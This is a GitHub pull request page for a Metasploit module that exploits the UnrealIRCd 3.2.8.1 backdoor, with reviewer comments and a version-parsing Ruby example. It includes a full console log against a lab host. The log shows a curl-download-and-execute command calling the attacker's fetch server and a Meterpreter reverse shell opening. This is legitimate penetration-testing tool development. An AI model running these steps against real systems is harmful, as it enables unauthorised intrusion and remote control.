Unreal_ircd_3281_backdoor: Add checks & targets #20952
Merged
bwatters-r7 merged 6 commits into rapid7:master on Feb 24, 2026
Contributor
Note to self: check if payload selection works on this module
dwelch-r7
reviewed
Feb 12, 2026
bwatters-r7
reviewed
Feb 12, 2026
Contributor
Author
Thanks for your time @dwelch-r7 & @bwatters-r7!
bwatters-r7
reviewed
Feb 18, 2026
Fetch over CmdStager (& multiple targets)
This is based on MR feedback
4c5142e to f65dca1
Contributor
Author
Just done a force push.

Result:

```
$ msfconsole -q -x 'set VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use unix/irc/unreal_ircd_3281_backdoor; check; run'
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0
[*] Using configured payload cmd/linux/http/x86/meterpreter/reverse_tcp
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Checking IRC banner
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 10.0.0.10:6667 - Trying to register a new IRC user: romona
[*] 10.0.0.10:6667 - NICK romona
[*] 10.0.0.10:6667 - USER romona 0 * romona
:irc.Metasploitable.LAN 001 romona :Welcome to the TestIRC IRC Network romona!romona@10.0.0.1
:irc.Metasploitable.LAN 002 romona :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1
:irc.Metasploitable.LAN 003 romona :This server was created Sun May 20 2012 at 14:04:37 EDT
:irc.Metasploitable.LAN 004 romona irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.Metasploitable.LAN 005 romona UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=30 CHANLIMIT=#:30 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server
:irc.Metasploitable.LAN 005 romona WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=TestIRC CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ :are supported by this server
:irc.Metasploitable.LAN 005 romona EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
[*] 10.0.0.10:6667 - The target appears to be vulnerable.
[*] Command to run on remote host: curl -so ./wCTrvPzx http://10.0.0.1:8080/w4fGVgXiKHSuZJ1djTweGw;chmod +x ./wCTrvPzx;./wCTrvPzx&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTP server started
[*] Adding resource /w4fGVgXiKHSuZJ1djTweGw
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:6667 - Connecting to IRC service
[*] 10.0.0.10:6667 - Connected to 10.0.0.10:6667
[*] 10.0.0.10:6667 - Sending IRC backdoor command
[*] Client 10.0.0.10 requested /w4fGVgXiKHSuZJ1djTweGw
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Transmitting intermediate stager...(102 bytes)
[*] Sending stage (1062760 bytes) to 10.0.0.10
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:60114) at 2026-02-20 09:01:51 +0000
meterpreter >
```
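As an added example (not part of this PR or of the Metasploit module), the Ruby code below parses captured IRC registration replies like those in the log above and reports the version the server advertises, for inventory of hosts that still report the affected release. `parse_irc_line`, `advertised_version`, `FLAGGED_VERSION` and `SAMPLE` are hypothetical names chosen for this example.

```ruby
# Added example (not from the PR or the Metasploit module): parse IRC
# registration replies and report the version the server advertises.
FLAGGED_VERSION = 'Unreal3.2.8.1' # version string shown in the log above

# Split one IRC line into prefix, command and params (RFC 1459 framing).
def parse_irc_line(line)
  rest = line.strip
  prefix = nil
  prefix, rest = rest[1..].split(' ', 2) if rest.start_with?(':')
  return nil if rest.nil? || rest.empty?
  head, trailing = rest.split(' :', 2)
  params = head.split(' ')
  command = params.shift
  params << trailing unless trailing.nil?
  { prefix: prefix, command: command, params: params }
end

# Return { server:, version:, flagged: } from a list of reply lines.
# 004 (RPL_MYINFO) carries the version as its third parameter; 002
# (RPL_YOURHOST) carries it in free text and is used only as a fallback.
def advertised_version(lines)
  server = version = nil
  lines.each do |line|
    msg = parse_irc_line(line)
    next if msg.nil?
    case msg[:command]
    when '004'
      next if msg[:params].length < 3
      server = msg[:params][1]
      version = msg[:params][2]
    when '002'
      m = msg[:params].last.to_s.match(/running version (\S+)/)
      version ||= m[1] if m
      server ||= msg[:prefix]
    end
  end
  { server: server, version: version, flagged: version == FLAGGED_VERSION }
end

# Sample input: three reply lines copied from the log above.
SAMPLE = [
  ':irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...',
  ':irc.Metasploitable.LAN 002 romona :Your host is irc.Metasploitable.LAN, running version Unreal3.2.8.1',
  ':irc.Metasploitable.LAN 004 romona irc.Metasploitable.LAN Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj'
].freeze

puts advertised_version(SAMPLE).inspect if $PROGRAM_NAME == __FILE__
```

A version match identifies the release the server reports, not whether that particular build contains the backdoor.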
bwatters-r7
reviewed
Feb 21, 2026
Contributor
bwatters-r7
approved these changes
Feb 24, 2026
Contributor
Release Notes
Enhances the
Contributor
Author
Thanks @bwatters-r7 :D
After
Setup:
Check:
Target 0:
Target 1: